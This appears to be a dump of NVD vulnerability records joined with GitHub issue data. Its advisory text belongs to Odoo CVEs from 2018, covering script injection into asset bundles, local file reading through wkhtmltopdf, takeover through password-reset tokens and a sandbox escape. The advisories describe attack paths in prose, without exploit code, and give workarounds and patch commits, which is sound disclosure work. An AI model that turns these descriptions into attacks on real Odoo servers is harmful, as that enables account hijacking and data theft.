https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: a1b92ad2b8aa2873e8707ef13660771fd75dba8e - 10.0: 2c9c7e770addb152f6d424c3ea0f6ac9bcc25a56 - 11.0: ff45f227505df644c70bd02d804f48b3c3e54601 - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-8 (CVE-2018-14863) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32508/comments
0
2019-04-08T13:37:44Z
2019-04-08T13:37:45Z
https://github.com/odoo/odoo/issues/32508
430,456,676
32,508
477
CVE-2018-14864
2019-07-03T19:15:10.707
Incorrect access control in asset bundles in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32502" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32502" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "705E446A-98DC-43D6-905A-F52E3FDCAF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "F8E37238-5C5A-41E4-8D46-48446E539277", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/odoo/odoo/issues/32502
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-2 Incorrect access control in asset bundles in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment. **Affects**: Odoo 8.0, 9.0, 10.0 (Community and Enterprise Editions) **Component**: Core **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14864](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14864) ## I. Background Odoo's framework includes an automatic mechanism for minifying and bundling web assets, in order to speed up page loads. This works by grouping related assets in "bundles", and minifying them together as a simple file that can be compressed and loaded faster. As computing and compiling assets is an expensive operation, asset bundles are cached and stored in the database and file store. ## II. Problem Description The mechanism used to locate and serve cached assets bundles did not sufficiently validate the origin of the cached files. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: Unprivileged user account required **CVSS3 Score**: Medium :: 6.3 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)/E:P/RL:O/RC:C An attacker with a non privileged user account (including a simple portal user account) could upload a specially crafted attachment in order to poison the asset bundle cache, and inject arbitrary assets (JavaScript and CSS code). This could be used to hijack the sessions of any user accessing the Odoo database via a web browser and allow the attacker to gain elevated privileges. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround For portal users: administrators can modify the Access Control for Attachments (`ir.attachment`) and prevent external users (also know as "portal users") from creating or modifying attachments. External users do not normally need this permission except for posting messages with attachments in the portal, which is an acceptable trade-off. For internal users: administrators could further modify Access Control to prevent everyone from creating/modifying Attachments (`ir.attachment`). This will entirely prevent exploiting this vulnerability, but comes with a great functional impact. Many business processes will be disrupted, so this should only be used as a temporary solution, until the patch can be applied. For Odoo Online: all servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: e5984fbfc3141d83184c13b627a918f4d9913d0c - 10.0: 19ac9fba0d4be4e30d6103e6ebd49b466adb74b5 - 11.0: bfffe39f1376a56226572295b945a2cc73ba50ce - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-2 (CVE-2018-14864) - Incorrect access control in ass...
https://api.github.com/repos/odoo/odoo/issues/32502/comments
0
2019-04-08T13:37:25Z
2019-04-08T13:37:30Z
https://github.com/odoo/odoo/issues/32502
430,456,495
32,502
478
CVE-2018-14865
2019-07-03T19:15:10.767
Report engine in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32501" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/odoo/odoo/issues/32501
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-1 Report engine in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Core **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14865](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14865) ## I. Background Odoo's report engine relies on the external program "wkhtmltopdf" to generate PDF documents from HTML files rendered from report templates. Wkhtmltopdf supports loading remote resources such as images or stylesheets, but also permits loading local files. ## II. Problem Description The report engine does not prevent access to local files during rendering by Wkhtmltopdf. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: Unprivileged user account required **CVSS3 Score**: High :: 7.7 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N) Untrusted administrators on hosted databases may alter their report templates in order to trick the report engine into including local server files. External non-privileged users may also be able to trick the report engine into including local files, by crafting malicious RPC requests. Both methods could result in the disclosure of system files that are readable by the Odoo server process, including Odoo configuration files or other system files that could possibly include passwords or sensitive data. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround Attackers exploiting this vulnerability can only access files readable by the Odoo server process. Sensitive files might therefore be protected by using filesystem-level permissions. However, it is very hard to effectively secure a system in this manner, so applying the patch or updating your installation is strongly recommended instead. Alternatively, the wkhtmltopdf executable could be replaced by a command script that executes the actual wkhtmltopdf command with an extra parameter "--disable-local-file-access". Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: d5efba256138464618a7bfa8f52beb3eaae50509 - 10.0: dae282279947e1f9cccad5ec0244ee654132509b - 11.0: d255628ecf564d54825a55c662eeee552e66377a - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-1 (CVE-2018-14865) - Report engine in Odoo Community...
https://api.github.com/repos/odoo/odoo/issues/32501/comments
0
2019-04-08T13:37:23Z
2019-04-08T13:37:25Z
https://github.com/odoo/odoo/issues/32501
430,456,471
32,501
479
CVE-2018-14859
2019-07-03T20:15:10.777
Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32510" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32510" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/odoo/odoo/issues/32510
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-10 Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Odoo Framework **Credits**: Swapnesh Shah, Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14859](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14859) ## I. Background The "External Signup" module (auth_signup) allows external users to create accounts on databases where the feature is installed and enabled. It also provides a password reset feature, so that users can recover their accounts by clicking on a secure link received by email. ## II. Problem Description A secret field used to contruct the secure reset password link was not properly protected againt access by internal users of the systems. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: "Employee" access required **CVSS3 Score**: High :: 8.1 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) A malicious internal user (a regular "Employee" account) could trigger a reset password for a user, and use the value of the secret field to change the password of other users before they could react to the email. This would work even when targetting administrator accounts. The victim would likely notice both a suspicious reset password message and the fact that they would now be unable to sign in with their usual password, but possibly not before the attacker was able to abuse the credentials of the user. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround An administrator may disable the reset password feature to prevent the attack. As the reset password is a convenient feature exepcted by users registering on a system, applying the patch or updating is strongly recommended. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 57ea939edac7ae4fa19306bf827231027f3c245c - 10.0: 7501691da9a9dae832b7d6e78c6a5f57fc983b5c - 11.0: cbce12642570e6b65d7b21738712c189f6cdee5d - 11.0-ent, 10.0-ent and 9.0 (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-10 (CVE-2018-14859) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32510/comments
0
2019-04-08T13:37:50Z
2019-04-08T13:37:51Z
https://github.com/odoo/odoo/issues/32510
430,456,723
32,510
480
CVE-2018-14860
2019-07-03T20:15:10.837
Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.3, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32505" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32505" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "D9126A1A-FA35-4127-91B3-A3FA8B26FABB", "versionEndExcluding": null, "versionEndIncluding": "11.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "9ACA123F-EF25-4E9D-8D60-4368B2F25FA0", "versionEndExcluding": null, "versionEndIncluding": "11.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/odoo/odoo/issues/32505
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-5 Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system. **Affects**: Odoo 11.0 and earlier (Community and Enterprise Editions) **Component**: Odoo Framework **Credits**: \<Undisclosed\> **CVE ID**: [CVE-2018-14859](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14859) ## I. Background Odoo includes a sandbox for interpreting dynamic business logic components, such as the definition of workflows, automated actions, or the dynamic expressions used within report templates. The mechanism behind this sandbox is called 'safe eval' and keeps the system safe while allowing advanced customizations. Its role is to execute user-provided Odoo business logic, while preventing any undesired effects on the data or the hosting platform - such as could be caused by accident or by malicious users. In order to be allowed to customize any of these dynamic business logic components, one must usually be an administrator of an Odoo database, or have otherwise received elevated privileges. ## II. Problem Description The default 'safe eval' sandbox environment was not sufficiently sanitized, so an attacker with sufficient privileges might be able to escape the sandbox through the use of specially crafted dynamic expressions. Systems who host Odoo databases for untrusted users are particularly at risk, (e.g. SaaS platforms), as they typically allow users to become administrators of their own Odoo database. This is sufficient to exploit the vulnerability. ## III. Impact Access Vector: Network exploitable Access Complexity: Medium **Authentication**: Privileged user account required **CVSS3 Score**: Critical :: 9.1 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) Malicious users with access to an administrator account on an Odoo database might craft special code expressions specifically targeted at escaping the sandbox protection. This could in turn be used to execute arbitrary code as the user running the Odoo service, to launch system commands with access to local files and local services. Files and environments accessed in this manner may contain sensitive information such as passwords that could also allow the user to gain elevated privileges on the hosting machine itself, in addition to being able to run commands. Exploiting this vulnerability requires remote network access and administrator (or privileged) account on a database hosted on a vulnerable Odoo installation. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround No workaround is available, but systems that do not provide administrator or otherwise privileged access to untrusted users are not vulnerable. All Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 779ceac97309fd69086446bc14e6d613aeb9bbdd - 10.0: ef017ab1ab7bc5988ad30ab92a445079e245cf03 - 11.0: 21bb14d17764f16ca2727622d7892d38104e2ec3 - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-5 (CVE-2018-14860) - Improper sanitization of dynami...
https://api.github.com/repos/odoo/odoo/issues/32505/comments
0
2019-04-08T13:37:37Z
2019-04-08T14:38:16Z
https://github.com/odoo/odoo/issues/32505
430,456,607
32,505
481
CVE-2019-13207
2019-07-03T20:15:11.823
nsd-checkzone in NLnet Labs NSD 4.2.0 has a Stack-based Buffer Overflow in the dname_concatenate() function in dname.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/nsd/issues/20" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FDS4H7WVHQGCX3LF72F5K22VJXN7HDBB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/nsd/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FDS4H7WVHQGCX3LF72F5K22VJXN7HDBB/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nlnetlabs:name_server_daemon:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1094EB8B-F2D4-4E0D-8984-2BE120CD8739", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/NLnetLabs/nsd/issues/20
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NLnetLabs", "nsd" ]
